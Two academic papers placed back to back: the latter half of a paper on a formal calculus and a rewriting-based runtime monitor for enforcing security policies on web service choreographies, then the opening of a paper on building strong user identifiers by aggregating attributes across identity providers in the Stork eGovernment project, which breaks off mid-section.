III. SECURITY POLICY SPECIFICATION LANGUAGE

In this Section, we introduce the Security Policy Calculus (SPC), a formalism used for describing security policies. SPC is a subset of EPC in the sense that it uses only some of the operators of EPC; the operators used in SPC are communication actions, recursion, indeterministic choice and inaction. Security policies will be represented by processes that monitor the execution of another process from EPC.
Figure 1. Operational semantics of EPC

A. Syntax

The syntax of SPC is given by:

φ ::= s◃⊕ᵢ opᵢ.φᵢ ∣ s▹Σᵢ opᵢ.φᵢ ∣ φ₁⊕φ₂ ∣ rec X.φ ∣ 0

• The construct s◃⊕ᵢ opᵢ.φᵢ expresses the fact that invoking one of the operators opᵢ through the session channel s is permitted by φ.
• Next we have s▹Σᵢ opᵢ.φᵢ, which allows the reception of the operators opᵢ through s.
• The indeterministic branching is given by φ₁⊕φ₂.
• For representing repeated behaviors, we use the recursion operator rec X.φ.
• Finally, 0 denotes the lack of actions.

For describing security properties, we usually need to express the prohibition of executing some actions. In our case, when we want, for example, to forbid sending the operation op₁ through s, we write the security property φ = s◃⊕_{i≠1} opᵢ.0, which says that we can invoke any of the operators opᵢ except op₁. If we want this behavior to be repeatedly verified, we write φ = rec X. s◃⊕_{i≠1} opᵢ.X. The semantics are the same as for EPC, since SPC is a subset of EPC.

Usually, temporal logics are used for describing security properties, but with the Security Policy Calculus we also reach our goal of expressing any security property that we want to enforce on the behavior of a WS. Since this approach introduces a dynamic verification of WS, the security properties that we verify in this paper are safety properties and liveness properties without infinite behavior; the reason behind this choice is that some liveness properties can only be verified statically.

B. Shortcuts

For brevity, we will denote by ϕ_s and ϕ̄_s the portions of a security property that allow, respectively, all input and all output interactions through s; that is, ϕ_s = s▹Σᵢ opᵢ(xᵢ) and ϕ̄_s = s◃⊕ᵢ opᵢ(eᵢ).
C. Example

In the airline reservation system, assume the travel agent wants to be sure that his service does not send tickets before the reception of payment details. The travel agent receives payment details within the book message s▹book(x₃) and sends tickets within the tickets message s◃tickets(e₄). So, we want to ensure that s◃tickets(e₄) does not occur before s▹book(x₃).
The security property is written as follows:

rec X. ( s◃⊕_{opᵢ≠tickets} opᵢ(eᵢ).X ⊕ s▹Σ_{opᵢ≠book} opᵢ(xᵢ).X
⊕ ϕ̄_s'.X ⊕ ϕ_s'.X ⊕ s▹book(x).
(rec Y. ϕ̄_s.Y ⊕ ϕ_s.Y ⊕ ϕ̄_s'.Y ⊕ ϕ_s'.Y) )

The security property is written using a recursion. The idea is to put the recursion variable X after each action different from book and tickets. Thus, the property remains invariant when executing these actions; it evolves only by executing the book message. In this recursion, one of these four blocks will be executed:

• s◃⊕_{opᵢ≠tickets} opᵢ(eᵢ).X : it prohibits invoking the tickets operator through s, which is shared between the traveler and the travel agent. Any message different from tickets can be sent.
• s▹Σ_{opᵢ≠book} opᵢ(xᵢ).X : this block prohibits the reception of a book operator invocation through the session channel s. Any message different from book can be received.
• ϕ̄_s'.X and ϕ_s'.X : all actions are permitted between the travel agent and the airline reservation service. The channel s' is a session channel shared between the travel agent and the airline reservation system.
• s▹book(x).(rec Y. ϕ̄_s.Y ⊕ ϕ_s.Y ⊕ ϕ̄_s'.Y ⊕ ϕ_s'.Y) : this block intercepts the invocation of the book operator within the travel agent; we then lift the control on the tickets operator by allowing all actions between the traveler and the travel agent through s, and between the travel agent and the airline reservation system through s', to be executed.
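This recursive property can be read as a small two-state monitor: before a book message is received on s, sending tickets on s is forbidden; afterwards, everything is allowed. An illustrative Python sketch (our own action encoding, not the paper's calculus):

```python
def make_monitor():
    """Two-state monitor for: 'no tickets on s before book is received on s'."""
    state = {"book_received": False}

    def permits(action):
        channel, direction, op = action  # direction: '!' send, '?' receive
        if state["book_received"]:
            return True                   # rec Y branch: everything is allowed
        if channel == "s" and direction == "!" and op == "tickets":
            return False                  # tickets before book is forbidden
        if channel == "s" and direction == "?" and op == "book":
            state["book_received"] = True # take the s ▹ book(x) branch
        return True
    return permits

permits = make_monitor()
assert permits(("s'", "!", "checkSeat"))   # actions on s' are unconstrained
assert not permits(("s", "!", "tickets"))  # tickets cannot precede book
assert permits(("s", "?", "book"))
assert permits(("s", "!", "tickets"))      # allowed once book was received
```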
IV. ENFORCEMENT APPROACH

In this Section, we introduce our enforcement approach based on rewriting techniques. This approach consists in adding special actions to the processes representing the behavior of a WS and to a security property, in order to make them synchronize on each interaction that will occur.
A. Communication Actions of EPC

Communication actions are used in this context to designate the interactions of EPC, which are given by these two constructs: s◃op(e) and s▹Σᵢ opᵢ(xᵢ). They are distinguished by three criteria:
• the session channel (s),
• the operator name (opᵢ),
• and the direction (s◃ or s▹).
Indeed, each interaction in EPC occurs through a session channel that has been freshly generated and shared between two participants. Within each interaction, an operator is either invoked or offered, depending on the direction of the interaction. For instance, s◃op₁(e) is an invocation of the operator op₁ through the session channel s, and s'▹op₂(x) is a reception of an invocation of the operator op₂ on the session channel s'. The goal of this approach is to monitor the execution of interactions inside a choreography. This goal will be achieved by controlling the execution of the communication actions of EPC.
B. Synchronization Actions

Synchronization actions are special actions that we add to the process and to the security property enforced on this process, in order to ensure the interception of each communication action by the monitor. The idea of using synchronization actions to intercept actions is inspired from [6]. Given a communication action s◃op(e) (respectively s▹Σᵢ opᵢ(xᵢ)), the corresponding synchronization action is written with an overbar as s̄◃op(e) (respectively s̄▹Σᵢ opᵢ(xᵢ)).
C. Rewriting Processes

In order to achieve our goal, which consists in enforcing a security property on the behavior of a participant A in a choreography, we need to rewrite its process by adding synchronization actions. Informally, we add before each communication action its corresponding synchronization action. The formal rules for rewriting a process P of EPC are:

⟨!ch(s̃).P⟩ := !ch(s̃).⟨P⟩
⟨ch(ν s̃).P⟩ := ch(ν s̃).⟨P⟩
⟨x:=e.P⟩ := x:=e.⟨P⟩
⟨P⊕Q⟩ := ⟨P⟩⊕⟨Q⟩
⟨P∣Q⟩ := ⟨P⟩∣⟨Q⟩
⟨if e then P else Q⟩ := if e then ⟨P⟩ else ⟨Q⟩
⟨rec X.P⟩ := rec X.⟨P⟩
⟨s◃op(e).P⟩ := s̄◃op(e). s◃op(e). ⟨P⟩
⟨s▹op(x).P⟩ := s̄▹op(x). s▹op(x). ⟨P⟩
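These rules are a structural recursion over process terms, and can be sketched as such. The following Python fragment uses our own tuple encoding of processes (constructor names like "send", "recv", "plus" are ours, not EPC's); a "sync-" node models the synchronization action inserted in front of each communication action:

```python
def rewrite(p):
    """Insert a synchronization action before each communication action."""
    kind = p[0]
    if kind in ("send", "recv"):                  # s ◃ op(e).P / s ▹ op(x).P
        _, s, op, cont = p
        return ("sync-" + kind, s, op, (kind, s, op, rewrite(cont)))
    if kind in ("plus", "par"):                   # P ⊕ Q and P | Q
        return (kind, rewrite(p[1]), rewrite(p[2]))
    if kind in ("bang", "init", "assign", "rec"): # prefixes: rewrite the body
        return p[:-1] + (rewrite(p[-1]),)
    if kind == "if":                              # if e then P else Q
        return ("if", p[1], rewrite(p[2]), rewrite(p[3]))
    return p                                      # 0 and term variables

P = ("send", "s", "quoteRequest", ("recv", "s", "accept", ("nil",)))
print(rewrite(P))
# ('sync-send', 's', 'quoteRequest',
#  ('send', 's', 'quoteRequest',
#   ('sync-recv', 's', 'accept', ('recv', 's', 'accept', ('nil',)))))
```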
D. Rewriting Security Properties

Rewriting the security property consists in replacing each communication action by its synchronization action. The formal rules for rewriting security properties are:

⟨s◃⊕ᵢ opᵢ.φᵢ⟩ := s̄◃⊕ᵢ opᵢ.⟨φᵢ⟩
⟨s▹Σᵢ opᵢ.φᵢ⟩ := s̄▹Σᵢ opᵢ.⟨φᵢ⟩
⟨φ₁⊕φ₂⟩ := ⟨φ₁⟩⊕⟨φ₂⟩
⟨rec X.φ⟩ := rec X.⟨φ⟩
E. Restriction Operator

In order to make the rewritten security property φ and the rewritten process P synchronize, we define an operator of EPC that we call the restriction operator, denoted P∖φ. The role of this operator is to let the process evolve normally when no communication action is about to occur. Before a communication action occurs, P∖φ intercepts its synchronization action and verifies whether the security property can evolve by executing this synchronization action. If this is the case, then P and φ execute this synchronization action; otherwise, P blocks and does not execute any further actions. Another role of this enforcement operator is to hide the synchronizations of P and φ from the rest of the choreography; thus, executions of synchronization actions in EPC are marked by τ as silent actions. Our restriction operator therefore does not affect the evolution of P when no synchronization action is about to occur: P∖φ must ensure the synchronization of P and φ on synchronization actions only.
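The intended behavior of P∖φ can be sketched as a trace filter. The following Python fragment is illustrative only (our own encoding, not the calculus): synchronization actions are checked against a policy predicate and hidden as τ when allowed, and the process blocks on the first rejected one, while safe actions pass through unchanged:

```python
def run(trace, permits):
    """Run a linear trace of actions under a policy predicate.

    Sync actions are checked against the policy and hidden as 'tau';
    a rejected sync action blocks the process; safe actions pass through."""
    out = []
    for action in trace:
        if action[0] == "sync":            # candidate synchronization action
            if not permits(action[1:]):
                out.append("blocked")
                break                      # P blocks: no further actions
            out.append("tau")              # hidden from the choreography
        else:
            out.append(action)
    return out

permits = lambda a: a != ("s", "send", "tickets")
ok = run([("sync", "s", "recv", "book"), ("s", "recv", "book")], permits)
bad = run([("sync", "s", "send", "tickets"), ("s", "send", "tickets")], permits)
print(ok)   # ['tau', ('s', 'recv', 'book')]
print(bad)  # ['blocked']
```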
F. Normal Form of a Process

Every process representing the local behavior of a participant in a WS can be written as an internal sum of processes, which we call the normal form of a process:

P = ⊕_{i∈I} aᵢ.Pᵢ

where the aᵢ range over atomic actions, I is a finite subset of the natural numbers, and the Pᵢ range over processes. The atomic actions of EPC are: session initiation request (ch(ν s̃)), session initiation offer (!ch(s̃)), communication input (s▹op(x)), communication output (s◃op(e)), assignment (x:=e) and the synchronization actions (s̄▹op(x), s̄◃op(e)).
In what follows, we prove the correctness of our theory by first defining a partial order over processes and a satisfaction notion.
G. Simulation
We say that a process P can execute an action a and become P', written P →^a P', if, when P is written in its normal form (P = ⊕_{i∈I} ai . Pi), there exists j ∈ I such that aj = a and Pj ≡ P', where ≡ is the structural equality defined in the semantics of EPC.
A. Definition (Subprocess)
Let P, Q be two processes. We say that P is a subprocess of Q, written P ⊆ Q, if the following condition holds:
P →^a P' ⇒ Q →^a Q' and P' ⊆ Q'.
H. Semantics
Reduction rules for making P∖φ progress when executing synchronization actions are given by:

(Out-Sync)  P →^{s◃op(e)} P'  and  φ →^{s◃op(e)} φ'   ⟹   A[P∖φ]σ →^τ A[P'∖φ']σ
(In-Sync)   P →^{s▹op(x)} P'  and  φ →^{s▹op(x)} φ'   ⟹   A[P∖φ]σ →^τ A[P'∖φ']σ
V. PROOF OF THE APPROACH
B. Definition (Safe Action, Safe Trace)
A trace ξ of EPC is a sequence of atomic actions
executed by a process. An atomic action is said to be safe if
it is not a synchronization action. A trace is said to be safe if
it contains only safe actions.
C. Definition (Progression of P)
We say that a process P can progress by executing some safe actions and a synchronization action a and become Q, written P ⇥^a Q, if there exist a safe trace ξ and a process P' such that P →^ξ P' and P' →^a Q.
The In-Sync and Out-Sync rules above say that each synchronization action of P is intercepted by φ and cannot be executed if φ prohibits it. If the synchronization action can be executed by φ, then P silently becomes P' and φ becomes φ'.
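A minimal sketch of this enforcement behaviour, assuming a toy encoding of P and φ as transition tables (this is an illustration, not the paper's EPC semantics):

```python
# Minimal sketch of the restriction operator P ∖ φ as a run-time monitor:
# synchronization actions must be matched by the property, which then steps
# silently (τ); all other (safe) actions pass through unchanged.
# Both P and φ are toy transition functions: state -> {action: next_state}.

def step(p_state, phi_state, action, P, PHI):
    """One step of P ∖ φ; returns (p', phi') or None if the step is blocked."""
    if action not in P.get(p_state, {}):
        return None                              # P itself cannot move
    p_next = P[p_state][action]
    if action.startswith("sync_"):               # synchronization action
        if action not in PHI.get(phi_state, {}):
            return None                          # φ forbids it: P blocks
        return p_next, PHI[phi_state][action]    # both move, marked τ outside
    return p_next, phi_state                     # safe action: φ is unchanged

P   = {0: {"sync_ticket": 1}, 1: {}}
PHI = {"X": {}}                                  # φ never allows sync_ticket
print(step(0, "X", "sync_ticket", P, PHI))       # None -> P is blocked
```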
I. Example
Consider the airline reservation system case study. We enforce the security property φ defined in the previous example on the behavior P of the travel agent defined in the first example of this paper. The rewritten process and security property are:
P = !chTA(s). s◃ack. s◃ack. s▹orderTrip(x1). s▹orderTrip(x1). chA(νs'). s'▹ack. s'▹ack. s'◃checkSeat(e1). s'◃checkSeat(e1).
( s'▹noSeat. s'▹noSeat. s◃cancel. s◃cancel. 0
⊕ s'▹seatOk(x2). s'▹seatOk(x2). s◃available(e2). s◃available(e2). s▹book(x3). s▹book(x3). s'◃reserve(e3). s'◃reserve(e3). s'▹reserved(x4). s'▹reserved(x4). s◃ticket(e4). s◃ticket(e4). 0
⊕ s'▹notReserved(x5). s'▹notReserved(x5). s◃cancelBook. s◃cancelBook. 0 )

(each communication action is paired with its synchronization action)

φ = rec X. s◃⊕_{opi≠ticket} opi(ei).X ⊕ s▹Σ_{opi≠book} opi(xi).X ⊕ 〈φs'〉.X ⊕ 〈φ̄s'〉.X ⊕ s▹book(x). rec Y. 〈φs〉.Y ⊕ 〈φ̄s〉.Y ⊕ 〈φs'〉.Y ⊕ 〈φ̄s'〉.Y

where 〈φs〉 = s▹Σi opi(x), 〈φ̄s〉 = s◃⊕i opi(ei), and similarly for 〈φs'〉 and 〈φ̄s'〉.
D. Definition (Satisfaction Notion)
We say that a process P satisfies a security property φ, written P ≈ φ, if for every synchronization action a such that P ⇥^a P' we have φ →^a φ' and P' ≈ φ'.
E. Theorem
Let P be a process and φ a security property. The following properties hold:
• P∖φ ⊆ P,
• P∖φ ≈ φ,
• ∀P' ≈ φ, P' ⊆ P ⇒ P' ⊆ P∖φ.
F. Proof
• The first property follows directly from the reduction rules of our enforcement operator and from the definition of ⊆: indeed, P∖φ is defined so that it cannot execute any action that P does not execute.
• For the second property, let a be a synchronization action such that P∖φ ⇥^a P'∖φ'. There exists a safe trace ξ such that P∖φ →^ξ P''∖φ and P''∖φ →^a P'∖φ'. But executions of synchronization actions by P''∖φ are given by the In-Sync and Out-Sync rules; hence necessarily φ →^a φ'.
• For the third property, let P' be a process satisfying a security property φ and such that P' ⊆ P, and suppose P' →^a P''. As P' ⊆ P, we have P →^a Q. If a is a synchronization action then, from the hypothesis P' ≈ φ, we conclude that φ →^a φ' and then P∖φ →^a Q∖φ'. If a is not a synchronization action then P∖φ →^a Q∖φ.

Returning to the airline example, TravelAgent[P∖φ] first uses the Init reduction rule to open a parallel session; then, for each communication action, it synchronizes with φ using the reduction rules of P∖φ and then communicates using the communication reduction rules. One can easily see that this process P satisfies the security property φ.
VI. RELATED WORK
Several works have studied the correctness and
conformance of composition of WS to security
requirements.
A. Baouab et al. [7] present a run-time event-based approach to the problem of monitoring the conformance of interaction sequences. When a violation is detected, errors are shown in dashboards, so the execution is not stopped before the violation occurs. J. Simmonds et al. [8] formalize sequence diagrams to express WS conversations and security requirements, translate them to nondeterministic finite automata (NFA), and generate monitors from the NFA. Their WS conversations are extracted from the definitions of simple services, so they do not consider the much larger number of conversations that arise from the composition of WS. D. Dranidis et al. [9] introduced an approach to verify the conformance of a WS implementation against a behavioral specification through the application of testing. Stream X-machines are used as an intuitive modeling formalism for constructing the behavioral specification of a stateful WS, together with a method for deriving test cases from that specification in an automated way. The test generation method produces complete sets of test cases that, under certain assumptions, are guaranteed to reveal all non-conformance faults in a service implementation under test. However, this approach only reports non-conformance faults and does not react dynamically to these errors. Furthermore, L. Ardissono et al. [10] propose a monitoring framework for a choreographed service which supports the early detection of faults and decides whether it is still possible to continue the service.
R. Gay et al. [11] have proposed service automata as a framework for enforcing security policies in distributed systems. They encapsulate the program in a service automaton composed of the monitored program, an interceptor, an enforcer, a coordinator, and a local policy. The interceptor intercepts critical actions and passes them to the coordinator, which determines whether the action complies with the security policy and decides upon possible countermeasures; the enforcer then implements these decisions. However, the authors do not specify how to detect critical actions. W. She et al. [13] have developed an innovative security-aware service composition protocol with composition-time information flow control, which can reduce the execution-time failure rate of composed composite services due to information flow control violations. This approach only guarantees the absence of access control violations at composition time but does not guarantee their absence at runtime. Jose A. Martín et al. [14] developed a framework based on the partial model checking technique for statically verifying whether a composition of WS satisfies cryptographic properties such as secrecy and authenticity.
VII. CONCLUSION AND FUTURE WORK
The goal of this research is to introduce an automated formal approach for dynamically enforcing security policies on a choreography of WS using the rewriting technique. We used a formal language to express the conversations of the different participants and also to express security requirements. Then, we showed how to restrict the progression of a participant's behavior in order to satisfy the security policies. Future work will concentrate on optimizing this approach by reducing the number of synchronization actions added to processes.
REFERENCES
[1] IBM Corporation, "Business process execution language for web services (BPEL4WS)," http://www.ibm.com/developerworks/library/wsbpel/, 2002.
[2] N. Kavantzas, D. Burdett, G. Ritzinger, T. Fletcher, and Y. Lafon, "Web services choreography description language version 1.0," W3C Working Draft, December 2004.
[3] M. Carbone, K. Honda, and N. Yoshida, "Theoretical aspects of communication-centred programming," Electr. Notes Theor. Comput. Sci., vol. 209, 2008, pp. 125–133.
[4] N. Busi, R. Gorrieri, C. Guidi, R. Lucchi, and G. Zavattaro, "Towards a formal framework for choreography," in WETICE, 2005, pp. 107–112.
[5] G. Díaz, J. J. Pardo, M.-E. Cambronero, V. Valero, and F. Cuartero, "Automatic translation of WS-CDL choreographies to timed automata," in EPEW/WS-FM, 2005, pp. 230–242.
[6] M. Langar, M. Mejri, and K. Adi, "Formal enforcement of security policies on concurrent systems," J. Symb. Comput., vol. 46, no. 9, 2011, pp. 997–1016.
[7] A. Baouab, O. Perrin, and C. Godart, "An optimized derivation of event queries to monitor choreography violations," in ICSOC, 2012, pp. 222–236.
[8] J. Simmonds et al., "Runtime monitoring of web service conversations," IEEE T. Services Computing, vol. 2, no. 3, 2009, pp. 223–244.
[9] D. Dranidis, E. Ramollari, and D. Kourtesis, "Run-time verification of behavioural conformance for conversational web services," in ECOWS, 2009, pp. 139–147.
[10] L. Ardissono, R. Furnari, A. Goy, G. Petrone, and M. Segnan, "Monitoring choreographed services," in Innovations and Advanced Techniques in Computer and Information Sciences and Engineering, 2007, pp. 283–288.
[11] R. Gay, H. Mantel, and B. Sprick, "Service automata," in Formal Aspects in Security and Trust, 2011, pp. 148–163.
[12] H. Yang, X. Zhao, Z. Qiu, G. Pu, and S. Wang, "A formal model for web service choreography description language (WS-CDL)," in 2006 IEEE International Conference on Web Services (ICWS 2006), Chicago, Illinois, USA, September 18-22, 2006, pp. 893–894.
[13] W. She, I. Yen, B. M. Thuraisingham, and E. Bertino, "Security-aware service composition with fine-grained information flow control," IEEE T. Services Computing, vol. 6, no. 3, 2013, pp. 330–343.
[14] J. A. Martín, F. Martinelli, I. Matteucci, E. Pimentel, and M. Turuani, "On the synthesis of secure services composition," in Engineering Secure Future Internet Services and Systems - Current Research, 2014, pp. 140–159.
Obtaining Strong Identifiers Through Attribute Aggregation
Walter Priesnitz Filho, Carlos Ribeiro
Inesc-id, Instituto Superior Técnico, Universidade de Lisboa
Lisboa, Portugal
Email: {walter.filho, carlos.ribeiro}@tecnico.ulisboa.pt
Abstract—The development of services and the demand for
resource sharing among users from different organizations with
some level of affinity motivate the creation of identity management systems. An identifier can be a single name or a number
that uniquely identifies a person, although this is often just a
representation of a facet of the person. In a federation, services
may require user facets comprised of attributes managed by
different identity systems which may then be perceived as two
facets of two distinct users and not as belonging to the same user.
This problem can be handled by adding a new entity type to the
traditional architecture thereby creating links between users from
different Identity Providers (IdPs), or by using ontologies in order
to establish relations between user attributes from several IdPs.
In this paper, we propose a solution consisting of obtaining strong
identifiers by combining user attributes within IdPs using direct
attribute matching and ontologies. Our application context is the
Stork 2.0 Project, an eGovernment Large Scale Project (LSP).
Keywords—Privacy; Identity Management Systems; Attribute
Aggregation.
I. INTRODUCTION
The development of services and the demand for resource
sharing among users from different organizations with some
level of affinity motivate the creation of identity federations.
An identity federation features a set of common attributes,
information exchange policies and sharing services, allowing
for cooperation and transactions between the Federation’s
members [1].
Although there is no definitive architecture, an identity federation is frequently described as comprising an Identity Provider (IdP), a Relying Party (RP), and a Service Provider (SP) [2]. An IdP is responsible for establishing, maintaining, and securing the digital identity associated with a subject; it may also verify the identity and handle the sign-up of that subject. An RP makes transaction decisions based upon receipt, validation, and acceptance of a subject's authenticated credentials and attributes within the identity system. Relying parties select and trust the identity and attribute providers of their choice, based on risk and functional requirements. Finally, the SP controls the access to the services and resources, relying on authorities [3].
An identity is composed of a set of attributes, of which at
least one identifies its owner. Although an identifier is often
seen as a single name or number that uniquely identifies a
person, this is often just a representation of a person’s facet,
characterizing the person as authorized to access a service (e.g., employee of, member of). Within a federation, identities of this kind are not by themselves relevant for authorization, given that different services require different user facets. Therefore,
that different services require different user facets. Therefore,
within a federation each person is characterized by a number
of attributes that may be combined to create several facets,
which are released whenever necessary to SPs. IdPs manage
these attributes, releasing them to SPs according to a security
policy, often when required by the authenticated user.
Inside a federation there might be services requiring user
facets comprised of attributes managed by different identity
systems, which is a problem because often those facets are
perceived as belonging to different users rather than the same
user. Facets composed of attributes managed by different IdPs
may be required for functionality reasons (e.g., checking the
curriculum vitae of a person with degrees in several different
universities) or it might be required just to increase the strength
of the identity.
According to [4], a strong identifier is capable of uniquely
identifying a subject in a population by minimizing multiplicity (i.e., the size of the subset of subjects that match that
identifier) within a group of subjects, thereby improving the
quality of the identification attributes. When considering the
overall strength of the identifier, in addition to the multiplicity
of the identifier, the Assurance Level of an attribute must also
be considered. Assurance Levels (ALs) [5] are the levels of
trust associated with a credential and depend on several factors, namely the associated technology, processes, and the policy and
practice statements controlling the operational environment.
In some cases, in order to build a strong identifier to satisfy a
service’s requirement it may be necessary to use a larger set of
attributes than the ones present in any IdP. However, incorrect
merging of attributes could result in credentials of different
persons being attributed to a single user if, for instance, they
share the same name and birthday or have other matching
attributes.
In this paper, we propose a solution to build strong identifiers by combining the users’ attributes within IdPs using
direct attribute matching and ontologies in order to find
correspondences in users' attributes distributed across IdPs.
This paper is structured as follows: Section II describes
some recent proposals on attribute merging. Section III describes open issues on building strong identifiers, while Section IV presents particular considerations and possibilities
for solving the problem. Finally, Section V considers future
research and remaining issues, and Section VI concludes the
paper.
II. RELATED WORK
The integration of diverse sources of attributes has been
the subject of research by several authors [4], [6]–[9]. Several
approaches have been proposed to overcome the challenges
discussed above. Some of the proposed solutions include:
Aggregation Entities, Aggregation with Focus on Privacy, and
Ontologies.
A. Aggregation Entities
Aggregation entities are specifically designed and run to
aggregate attributes from several sources.
The Linking Service (LS) is a special kind of aggregation
entity proposed in [6] and [7]. The LS acts as an intermediary
between the IdP and SP creating links, through user interaction, so that attributes that are present in more than one IdP
can be linked and used to identify the user of a particular
service. The solution proposed by the authors allows the users
to safely establish links between their accounts on several IdPs.
The LS connects the different identities and also manages the
authentication of different IdPs, so that the user is not required
to authenticate separately on each IdP.
The work proposed in [8] enriches the Linking Service concept with some privacy properties identified in Federated Identity Management Systems (FIMS). Firstly, an IdP should not be able to profile a user's actions; therefore, direct links between IdPs and SPs are not allowed, and direct interaction between IdPs and SPs is prevented by service-specific pseudonyms. Secondly, the disclosure of personal information is controlled by multiple parties, preventing any single entity from compromising user privacy. SPs cannot obtain users' personal information from IdPs without the prior consent of the users.
B. Aggregation with Focus on Privacy
Another proposal focused on privacy [11] uses an extension to the Oblivious Commitment-Based Envelope (OCBE) protocol. The proposed extension is a version of the OCBE protocol for equality predicates (Agg-EQ-OCBE) that analyses multiple functions simultaneously without a significant increase in computational cost; it also uses less bandwidth than EQ-OCBE.
C. Ontologies
The use of ontologies allows a higher degree of automation
in the process of attribute merging/aggregation. Through its
application, it is possible to deal with heterogeneity, which is
one of the problems related to aggregating data from different
sources.
In [12], the authors define four classes of heterogeneity: system heterogeneity, which occurs due to technical differences between platforms; syntactic heterogeneity, which is related to the representation and formats of data; structural heterogeneity, which results from differences in schemas; and semantic heterogeneity, which refers to differences in meaning generated by the different vocabularies and terminologies used.
Ontologies are used in order to share and reuse knowledge
[13]. In this context, an ontology is a specification used to
create ontological commitments, which are agreements to use
a certain vocabulary so that it is consistent with the theory
specified in that ontology.
In [14], the authors analysed the requirements of the Pan European e-Services and other features related with integration.
The analysis applies basic concepts from a generic model of
public service of Governance Enterprise Architecture (GEA)
and the Web Service Modelling Ontology (WSMO) to the
semantic description of e-Services.
Despite existing results on reliable attribute aggregation processes, on privacy-providing solutions, and on ontology mapping, a solution that integrates all of these properties has yet to be found.
III. OPEN ISSUES
When working with various integrated data sources, one should take into account the mechanisms that control which attributes and data sources should have their access released or denied. This briefly describes a pertinent issue, namely the privacy of the users involved in these processes of data-source integration and attribute aggregation.
Approaches used for attribute aggregation are beneficial for obtaining data from various sources, as they are intended to be. However, there are aspects of these approaches that could be improved, such as the availability of user data aggregators or the reliance on a single aggregation point.
In [10], the authors present lookup tables, dictionaries, and ontologies to map vocabularies and customers. They use aggregated zero-knowledge proofs of knowledge (AgZKPK) to allow users to prove ownership of multiple identity attributes without disclosing anything else. The proposal features an authentication service architecture (User-SP-IdP) with Registrar (R) entities, which store and manage information regarding the reliability/strength of the identifying attributes used in their approach.
According to [10], strong/reliable identification attributes are those capable of uniquely identifying a subject in a population (low multiplicity and high quality), while weak identification attributes are those that may correspond to several subjects (high multiplicity and low quality). Although two strong identification attributes may separately be able to uniquely identify a subject, their intersection may form a weak identification attribute set, which is not enough to uniquely identify a subject and is therefore not enough for merging two identities. Procedures using different IdPs, weak links, etc., could decrease the confidence level of merged identities.
The solutions presented in [10] address the treatment of name heterogeneity, mainly with regard to variations in wording, and restrict the language to English. In more heterogeneous environments, using lookup tables as the authors propose would not be feasible.
The use of ontologies is an interesting resource for aggregating users' attributes, but when considering the works mentioned above there is one aspect that must be taken into account: in the solutions presented, ontologies were only applied to a small number of databases.
The proposed solutions have also not yet been tested in a heavy-load environment; thus, they present no data showing how they perform in a production environment with multiple IdPs and a large number of users.
IV. PROPOSED SOLUTION
A. Application Context
Our application context is the Stork Project, which is one of five eGovernment Large Scale Projects (LSPs). The LSPs eCodex, epSOS, PEPPOL, and SPOCS carry information regarding justice, health care, procurement, and generic business processes, respectively, from one Member State (MS) service to another. These services communicate with each other through a network of gateways. Stork aims to provide a fundamental building block of any application or service: authentication. From this perspective, the Stork Project may share four different building blocks with the other LSPs: Authentication, Authorization, Electronic Signatures (long-term authentication), and Document Credentials (long-term authorization).
B. Solution
As mentioned earlier, previous solutions make no attempt to build strong identifiers by merging identities, or even to increase the assurance level of the identification process by joining attributes from several IdPs.
The Stork Project aims to be a basic building block for eGovernment services, providing services such as authentication and authorization. Our proposed mechanism will act in the Citizen "Pan European Proxy Service" (C-PEPS), the Stork gateway. C-PEPS takes on the task of verifying citizen credentials and obtaining additional data, e.g., about the represented person and mandates. This role also entails three business processes: Authentication on behalf of, Powers (digital signature), and Business Attributes. Each PEPS includes functionalities specific to its Member State, which are typically the interfaces with the local ID providers and the national and business attribute providers.
We propose a mechanism, named User Identification Strengthen (UsIdS), which performs an open search through the user's IdPs, finding correspondences in the user's attributes (UAs) in order to improve user identification strength. Through an iterative process, the user specifies which of the IdPs that can authenticate him/her at the SP he/she wants to use.
A search performed across all indicated IdPs can find matches that are able to certify, with a greater level of assurance, that a user is in fact who he/she claims to be. The greater the number of matches found, the greater the strength of the identifier, both because the number of attributes comprising the identifier grows and because some attributes with low assurance levels are repeated by several IdPs. An overview of our mechanism is shown in Fig. 1.
Fig. 1. Proposed search mechanism to find correspondences in user
identification attributes
The mechanism assumes, as a starting point, that the user provides a list of IdPs where UAs can be found. As can be observed in Fig. 1, the user sends a service request (Fig. 1, step 1), indicating the UsIdS as IdP. The SP redirects those instructions to the UsIdS (Fig. 1, step 2). Then, the user sends authentication attributes to, and authenticates with, the UsIdS (Fig. 1, step 3), and attribute set requests are sent to all of the user's IdPs (Fig. 1, steps 4a and 4b); the IdPs then send responses to the UsIdS (Fig. 1, steps 5a and 5b) with user attribute sets, each set containing at least the attribute name, Assurance Level (AL), and value. The purpose is to find direct attribute matches (intersections) in attribute sets that can confirm and strengthen the user's identity. The answers received can be handled in two ways, depending on the result of the UsIdS analysis of the IdP response.
If an attribute name match is found, the next step is to verify whether the attribute values correspond. Otherwise, when attribute names do not match, the next step is to verify on the reference ontology whether there is any Ontological Relation (OR) that may be established between the IdPs involved. If that is the case, the attribute values are checked for correspondence. When attribute names do not match and no ontological relations can be established, the UsIdS tries to establish a trusted IdP network.
To find IdPs, the UsIdS searches the stored ontological relations for previously used IdPs. A request for user information is then sent to those IdPs, and attribute sets are returned in response. The UsIdS looks for attribute relations (ARs) between each of the first two IdPs (e.g., IdP1 and IdPn) and the new one (e.g., IdPx). Once an AR is found between, say, IdP1 and IdPx (e.g., IdP1.AttrX = IdPx.AttrX), the existence of an AR between IdPn and IdPx is then verified. This is repeated until an AR can be found among three or more IdPs. When this occurs, the IdPx attribute set is searched for any attribute that may be used to improve the strength of the aggregated identity.
When a match is found, the AL of each attribute is verified
and the UsIdS sends, as the AL of aggregation, the lowest
value within the aggregated value pairs.
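The direct-matching step and the AL rule just described can be sketched as follows (a hypothetical encoding: each IdP's attribute set is a dict from attribute name to a (value, AL) pair; this is an illustration, not the Stork implementation):

```python
# Sketch of UsIdS direct attribute matching with assurance-level aggregation,
# assuming attribute sets are dicts: name -> (value, assurance_level).
# The AL reported for the aggregation is the lowest AL among matched pairs.

def direct_matches(set1, set2):
    """Attributes with the same name and the same value in both sets."""
    return {
        name: (set1[name][0], min(set1[name][1], set2[name][1]))
        for name in set1.keys() & set2.keys()
        if set1[name][0] == set2[name][0]
    }

def aggregation_al(matches):
    """AL of the aggregation: the lowest value within the aggregated pairs."""
    return min(al for _, al in matches.values()) if matches else None

idp1 = {"name": ("Alice", 3), "birthdate": ("1990-01-01", 2)}
idp2 = {"name": ("Alice", 2), "birthdate": ("1990-01-01", 4), "email": ("a@x", 1)}
m = direct_matches(idp1, idp2)
print(m, aggregation_al(m))
```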
In a more schematic way, the process can be seen as follows:
